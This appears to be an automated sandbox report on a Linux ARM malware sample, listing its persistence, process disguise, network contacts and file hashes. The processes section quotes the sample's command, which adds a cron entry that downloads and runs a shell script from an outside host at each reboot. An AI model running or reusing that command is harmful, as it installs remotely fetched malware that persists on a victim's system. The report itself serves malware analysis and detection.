Analysis Overview
SHA256
39207de2049b011a1f01695db33fec720fb0b7044a2557948cace8e12ddf6dfa
Threat Level: Shows suspicious behavior
The file c84fca197a6c0d8da1e804407643d901.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Enumerates running processes
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 01:45
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 01:45
Reported
2024-10-28 01:47
Platform
debian9-armhf-20240611-en
Max time kernel
150s
Max time network
143s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 194.36.144.87 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.TxaXvK | /usr/bin/crontab | N/A |
Enumerates running processes
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf | N/A |
Reads runtime system information
Processes
/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf
[/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab -]
Network
| Country | Destination | Domain | Proto |
| DE | 194.36.144.87:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:7425 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.TxaXvK
| MD5 | 166013c72061a26359c4b71ea7e3f82c |
| SHA1 | 22f63cee554a4e6dade457c043fb687d6843b9e7 |
| SHA256 | 9ae205f20ff39c525193c69898b9fb677905ed2e6b9de9a42311135923fe96fe |
| SHA512 | bf5812345971eed2131e77131faccf5a779ebb92bb2b628c056fa339a0d714cba6fd370b5d0db55c439eac4833d9a097867167cfb0c5c70368a5b2563b1fdc06 |